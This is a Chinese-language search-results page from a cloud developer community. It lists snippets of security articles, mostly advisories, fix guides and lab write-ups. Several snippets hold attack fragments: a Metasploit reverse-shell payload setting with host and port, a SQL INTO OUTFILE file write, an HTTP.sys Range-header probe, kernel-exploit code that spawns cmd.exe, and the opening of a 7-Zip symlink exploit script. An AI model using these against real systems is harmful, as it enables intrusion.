- 综合排序
- 最热优先
- 最新优先
- 来自专栏E=mc²
7类 登录注册 安全漏洞
二、账号可枚举 漏洞描述: 接口对于不同的账号、密码返回的数据不一样,攻击者可以通过回显差异进行用户名的枚举,拿到账户名之后,再进行密码的爆破 ? 3、限制一定时间内IP登录失败次数 三、密码未加密 四、手机验证码可爆破 漏洞描述 对验证码输入错误次数没有做任何限制+验证码的时效性高于爆破时间 修复建议: 1.点击获取手机验证码后产生即时更新强图形验证码 2.限制输入错误次数 3.缩短验证码的有效期 五、短信轰炸 漏洞描述 修复建议: 1.后端对同一手机号在某段时间只能发送一条短信,并且设置发送次数的上限 六、覆盖注册 七、任意用户密码重置 使用
1.6K10发布于 2020-08-17 - 来自专栏渗透测试专栏
渗透测试文件上传漏洞原理与验证(7)——上传漏洞防御
上传漏洞防御原则核心思想确保上传的文件不会被服务器解析成可执行的脚本,进而引发偏离功能设计的意外后果。 2、确保web server版本为最新,防止由于web server漏洞造成的文件意外解析3、部分文件上传攻击会配合本地其他漏洞进行,所以也要保证web服务器减少其他可利用漏洞。 IIS6.0文件解析漏洞升级IIS版本,IIS5.1与7.5均无此漏洞Apache文件解析漏洞不要使用AddHandler , 改用SetHandler , 写好正则 , 就不会有解析问题<FilesMatch >Require all denied</FilesMatch>Nginx文件解析漏洞1.将php.ini文件中的cgi.fix_pathinfo的值设为0。 Tomcat任意文件上传漏洞1、Tomcat任意文件上传漏洞环境较为苛刻,将Tomcat、jdk、php更新。2、避免开启可、通过 PUT 方式创建 JSP 文件的功能。
1K21编辑于 2024-12-05 - 来自专栏FreeBuf
漏洞预警|Samba远程代码执行漏洞,影响7年前版本
此次漏洞最早影响到7年前的版本,黑客可以利用漏洞进行远程代码执行。 漏洞编号 CVE-2017-7494 影响版本 Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本 漏洞简介 攻击者利用漏洞可以进行远程代码执行,具体执行条件如下: 1. 漏洞影响 Samba漏洞让人联想到前阶段席卷全球的WannaCry漏洞,研究人员怀疑该漏洞同样具有传播特性。 Rapid7的研究人员同样做了统计,他们检测到有110,000台计算机运行着官方不再提供支持的Samba版本,也就是说不会有针对这些版本的补丁。因此,此次Samba漏洞能够造成的影响可想而知。 漏洞修复 最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本。
1.3K70发布于 2018-02-26 - 来自专栏FreeBuf
CISA在漏洞利用列表中增加了7个新漏洞
美国网络安全和基础设施安全局(CISA)在其积极漏洞利用的安全问题列表中新添加了7个漏洞,其中包括来自Microsoft、Linux和Jenkins的漏洞。 所谓的已知被利用漏洞列表是在网络攻击中被积极利用并需要由联邦民事执行局(FCEB)机构修补的漏洞列表。 加上这七个漏洞,该目录现在包含 654 个漏洞,包括联邦机构必须应用相关补丁和安全更新的日期。 下面列出了本周添加的七个新漏洞,CISA 要求在 2022年5月16日之前对所有这些漏洞进行修补。 编号为CVE-2022-29464的WSO2漏洞于2022年4月18日被披露,几天后,一个漏洞利用程序被公开。Rapid7研究人员很快就看到了在攻击中使用公共PoC来部署网络外壳和硬币矿工。 参考来源 https://www.bleepingcomputer.com/news/security/cisa-adds-7-vulnerabilities-to-list-of-bugs-exploited-in-attacks
96020编辑于 2022-06-08 - 来自专栏子云笔记
Tomcat7+ 弱口令 && 后台getshell漏洞
jsp_shell_reverse_tcp set lhost 192.168.1.191 set lport 9999 exploit -j 1.jpg 2.jpg 3.jpg 4.jpg 5.jpg 6.jpg 7.
1.6K00编辑于 2022-03-27 - 来自专栏极安御信安全研究院
漏洞分析:HEVD-0x7.UninitializedHeapVariable
作者selph前言窥探Ring0漏洞世界:未初始化堆变量漏洞哪怕是类似原理的都用,在利用方式上也总能带来很多新鲜感,每次都有新的长见识,不断的感叹和震撼实验环境:•虚拟机:Windows 7 x86•物理机 :Windows 10 x64•软件:IDA,Windbg,VS2022漏洞分析老样子,先IDA找到该漏洞的触发函数TriggerUninitializedMemoryPagedPool,分析函数是如何存在漏洞的 ,当输入的值不是魔数,则会掉用指定位置的回调函数,如果是魔数则填充固定的回调函数去调用要如何利用,也跟上次思路一样,想办法控制该内存申请出现的位置,提前在内存里布置shellcode地址,然后再调用该漏洞函数触发漏洞 ,该漏洞是由未初始化和保存回调而导致的,该漏洞的控制码是:0x222033漏洞利用控制分页内存要按照上面的思路去进行利用,这里需要解决的一个问题就是,如何从用户层去控制该分页内存申请的位置之前在池溢出利用那里 "pause"); system("cmd.exe"); return 0;}截图展示参考资料•[1] Windows Kernel Exploitation Tutorial Part 7:
49330编辑于 2022-07-21 - 来自专栏yuancao博客
文件上传漏洞——sqli-labs第7关
SELECT “123” INTO OUTFILE “c:/123.txt"; 要使用联合查询写文件,不能使用and或者or拼接写文件 http://172.16.11.222/sqli-labs/Less-7/
1.9K42发布于 2020-07-30 - 来自专栏reizhi
IOS7爆后台漏洞 屏幕可被监控
但近日安全审计公司FireEye发现特殊IOS漏洞,能够在未越狱的设备上监控用户触摸事件。该漏洞可影响IOS 7.0.X以及6.1.X。 通过这一系统漏洞,app能够在后台监控用户的所有输入操作,包括屏幕触摸事件、按下按钮、激活TouchID甚至是所有的键盘输入。而且利用该漏洞并不要求设备越狱。 虽然Apple仍然没有对该漏洞表示任何观点,但在系统设置中关闭应用后台刷新并完全退出可以避免潜在的监控威胁。但这并不能阻止那些伪装成**音乐而需要持续性后台运行的app利用此监控漏洞。 虽然该漏洞并不要求设备越狱,但App Store严格的审核制度仍然能在一定程度上组织恶意程序上架。在此reizhi建议大家谨慎安装各种助手所提供的免越狱正版app。 在不久之前,Apple紧急推出了IOS 7.0.6更新修复SSL漏洞,而现在又被爆出后台监控漏洞。看来在IOS 7.1发布之前Apple还有得忙的。
45420编辑于 2022-09-26 - 来自专栏Web技术布道师
CVE-2019-11043: PHP 7 RCE漏洞分析
研究人员在PHP 7中找出有个远程代码执行(RCE)漏洞,该漏洞CVE编号为CVE-2019-11043。攻击者利用该漏洞只需要访问通过精心伪造的URL就可以在服务器上运行命令。 漏洞简介 该漏洞位于PHP-FPM模块的env_path_info函数,漏洞实际上是有个内存下溢破坏漏洞,攻击者利用该漏洞结合其他漏洞利用可以让攻击者在有漏洞的web网站上执行任意代码。 漏洞利用条件 fastcgi_split_path_info directive必须存在,并且含有以 ^开头,以 $结尾的正则表达式。 虽然漏洞利用只在PHP 7+版本上工作,但该漏洞本身存在于之前的版本中。 识别了有漏洞的目标后,攻击者可以在URL中加上'?a='并发送伪造的请求到有漏洞的web服务器。 建议 因为PoC漏洞利用已经在GitHub上公布了,虽然补丁已经发布了,但是黑客可能已经利用该漏洞了。
2.4K10发布于 2019-10-29 - 来自专栏OneMoreThink的专栏
漏洞研究(7):XXL-JOB执行器未授权访问漏洞(RESTful API)
加固措施 可参考XXL-JOB作者恨铁不成钢的防护建议:XXL JOB 未授权访问致远程命令执行 "漏洞" 声明 5.1 开启身份认证 配置accessToken,开启身份认证,调度中心和执行器的值需保持一致 target/xxl-job-executor-sample-springboot-2.2.0.jar 再次对执行器进行未授权任意代码执行,如果报错The access token is wrong,说明漏洞修复成功 iptables-services -y && service iptables save && systemctl enable iptables 再次对执行器进行未授权任意代码执行,如果没有响应,连接失败,说明漏洞修复成功
4.9K10编辑于 2025-05-14 - 来自专栏WalkingCloud
CentOS7 Sudo本地提权漏洞修复实践
CentOS7 Sudo本地提权漏洞修复 ? Sudo本地提权漏洞漏洞概述 最近国外研究团队披露出sudo堆溢出漏洞,漏洞编号:CVE-2021-3156,普通用户可以通过利用此漏洞,在默认配置的 sudo 主机上获取root权限。 它于2011年7月引入(commit:8255ed69),从1.8.2到1.8.31p2的所有旧版本以及从1.9.0到1.9.5p1的所有稳定版本的默认配置均受影响。 2)CentOS 7:升级到 sudo-1.8.23-10.el7_9.1 或更高版本 木有也有不升级的处理方法,但太麻烦,建议直接升级sudo解决 ? (图片可放大查看) CentOS7修复该漏洞的步骤实践 1、yum在线升级sudo yum makecache fast yum search sudo yum install sudo ?
3.8K30发布于 2021-02-25 - 来自专栏云鼎实验室的专栏
2025年7月企业必修安全漏洞清单
腾讯云安全参考“安全漏洞的危害及影响力、漏洞技术细节披露情况、该漏洞在安全技术社区的讨论热度”等因素,综合评估该漏洞在攻防实战场景的风险。 当漏洞综合评估为风险严重、影响面较广、技术细节已披露,且被安全社区高度关注时,就将该漏洞列入必修安全漏洞候选清单。 腾讯云安全定期发布安全漏洞必修清单,以此指引企业安全运维人员修复漏洞,从而避免重大损失。 以下是2025年7月份必修安全漏洞清单: 一、Microsoft SharePoint 远程代码执行漏洞(CVE-2025-53770) 二、 Redis hyperloglog 命令远程代码执行漏洞( ) 漏洞介绍及修复建议详见后文 一、 Microsoft SharePoint 远程代码执行漏洞 漏洞概述 腾讯云安全近期监测到Microsoft 官方发布了关于SharePoint 的风险公告,漏洞编号
17710编辑于 2026-04-09 - 来自专栏用户8851537的专栏
CentOS7修复内核CVE-2021-273632736427365漏洞
安全专家在 Red Hat 所有已测试版本和其他发行版本中均存在这些漏洞,属于 Linux 内核中的提权漏洞,可让攻击者轻松获得 root 权限,在 Linux 内核中已存在 15 年。 Linux 内核属于 5.11.4、5.10.21、5.4.103、4.19.179、4.14.224、4.9.260、4.4.260 或以上版本,已修复了这些漏洞。 /archive/kernel/el7/x86_64/RPMS/kernel-ml-5.12.8-1.el7.elrepo.x86_64.rpm 获取http://elrepo.srv.magticom.ge /archive/kernel/el7/x86_64/RPMS/kernel-ml-5.12.8-1.el7.elrepo.x86_64.rpm 警告:/var/tmp/rpm-tmp.F7O8Zj: 7 (Core)' 重启机器,即可升级到最新内核: [root@ecs-Sebnt ~]# uname -r 5.12.8-1.el7.elrepo.x86_64 注意:如果升级失败,可以开机时候选择原内核启动
2K20发布于 2021-08-19 - 来自专栏渗透测试专栏
渗透测试XSS漏洞原理与验证(7)——XSS Worm
蠕虫利用站点页面的XSS漏洞根据其特定规则进行传播和感染。 值得注意的是,XSS蠕虫只是Web 2.0蠕虫的其中一种,也是最广为人知的一种它利用网站的XSS漏洞进行散播。 Web2.0蠕虫还有其他形式,如CSRF Worm,顾名思义,该类蠕虫是利用网站的CSRF漏洞进行攻击。 蠕虫攻击流程 1、攻击者发现目标网站存在XSS漏洞,并且可以编写XSS蠕虫; 2、利用一个宿主(如博客空间)作为传播源头进行XSS攻击; 3、当其他用户访问被感染的空间时,XSS蠕虫执行以下操作: 判断用户是否登录 test.indexof('d',1)=2 //从前向后定位d 从第二个字符串开始,第一次出现的位置 test.indexof('d',5,2)=6 //从前向后定位d 从第5位开始向后查2位,即查询第5~7位 这次漏洞的成因是因为新浪对参数g完全没有过滤,这次攻击在Chrome、Safari中会被XSS Filter拦截,而IE、Firefox未能幸免。
58510编辑于 2024-11-09 - 来自专栏WalkingCloud
CentOS7下安装部署巡风系统【漏洞扫描】
巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。 请使用者遵守《中华人民共和国网络安全法》,勿将巡风用于非授权的测试 其主体分为两部分:网络资产识别引擎,漏洞检测引擎。 2、漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。 github.com/ysrc/xunfeng 安装指南 https://github.com/ysrc/xunfeng/blob/master/docs/install/Linux.md 下面介绍CentOS7下安装部署巡风的具体步骤
2.1K30发布于 2021-07-15 - 来自专栏全栈程序员必看
IIS7 HTTP.sys远程代码执行漏洞
GET /welcome.png HTTP/1.1 Host: www.test.com Range: bytes=0-18446744073709551615 ---- 显示结果若是包含以下结果证明漏洞存在
75420编辑于 2022-09-15 - 来自专栏编程随想曲
修复MySQL漏洞防火墙策略(CentOS7)
文 | 编程随想曲 首发 | 编程随想曲 1. 开启防火墙 service firewalld start 2. 查看3306端口是否开放 firewall-cmd --query-port=3306/tcp 3. 关闭3306端口 firewall-cmd --permanent --remove-port=3306/tcp firewall-cmd --reload 4. 设置特定IP可以访问3306端口 firewall-cmd --permanent --add-
87510编辑于 2022-04-21 - 来自专栏安恒信息
iOS 7新漏洞:无需密码可禁用定位功能
iOS 7中有一项新的Activation Lock特性。在iOS 7中要关闭Find My iPhone或擦除设备信息需要Apple ID和密码。 但是近日iOS 7被曝存在严重的安全漏洞,用户可在完全不知道Apple ID以及iCloud账户密码情况下,轻松关闭“查找我的iPhone”选项。 经过测试,目前运行iOS7.0.4系统的iPhone和iPad都无法幸免,不过运行iOS 7.1的设备却不存在问题,所以这次的高危漏洞可能在未来的升级中修复。 漏洞只能禁用查找iPhone功能,激活锁不会被移除。此外,任何使用Touch ID或锁码解锁的设备也不会受到该漏洞的影响。 Bradley Williams是发现这一漏洞的人,他曾试图就这一漏洞联系苹果,但至今未收到回应。
1.1K100发布于 2018-04-10 - 来自专栏信安百科
CVE-2024-11477|7-Zip代码执行漏洞(POC)
0x00 前言 7-Zip(7z解压软件)是一款完全免费的压缩解压缩软件,同其他压缩软件相比它的压缩速度更快压缩率更好,不仅支持众多主流格式、支持超线程,而且还有强大的AES-256加密算法可以为文件进行加密 它支持多种压缩格式,包括但不限于 7z、ZIP、GZIP、BZip2 和 TAR,此外,7-Zip 还能处理其他常见格式如 RAR、ISO、CAB 等。 0x01 漏洞描述 具体的缺陷存在于Zstandard解压的实现中。该问题是由于对用户提供的数据缺乏适当的验证造成的,这可能会导致在写入内存之前出现整数下溢。 0x02 CVE编号 CVE-2024-11477 0x03 影响版本 7-Zip < 24.07 0x04 漏洞详情 POC: https://github.com/TheN00bBuilder/cve
47810编辑于 2025-07-30 - 来自专栏网络安全技术点滴分享
7-Zip CVE-2025-11001漏洞利用工具
CVE-2025-11001 漏洞利用工具这是一个针对CVE-2025-11001漏洞的Python利用工具。 该漏洞影响7-Zip 21.02至25.00版本,允许攻击者通过特制的ZIP文件在具有管理员权限的7-Zip中实现任意文件写入。 功能特性自动化漏洞利用:自动生成包含符号链接的特制ZIP文件灵活配置:可自定义目标路径、输出文件名和数据文件精确控制:支持自定义顶层目录和链接名称跨平台兼容:基于Python开发,可在多平台运行安全测试 :仅影响Windows平台7-Zip必须以管理员权限运行受影响的7-Zip版本:21.02 - 25.00漏洞详情请参阅技术博客核心代码主执行脚本 (exploit.py)import argparseimport :利用7-Zip在处理包含符号链接的ZIP文件时的缺陷,当7-Zip以管理员权限运行时,会创建符号链接并写入文件到符号链接指向的位置,从而实现任意文件写入。
30010编辑于 2025-12-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号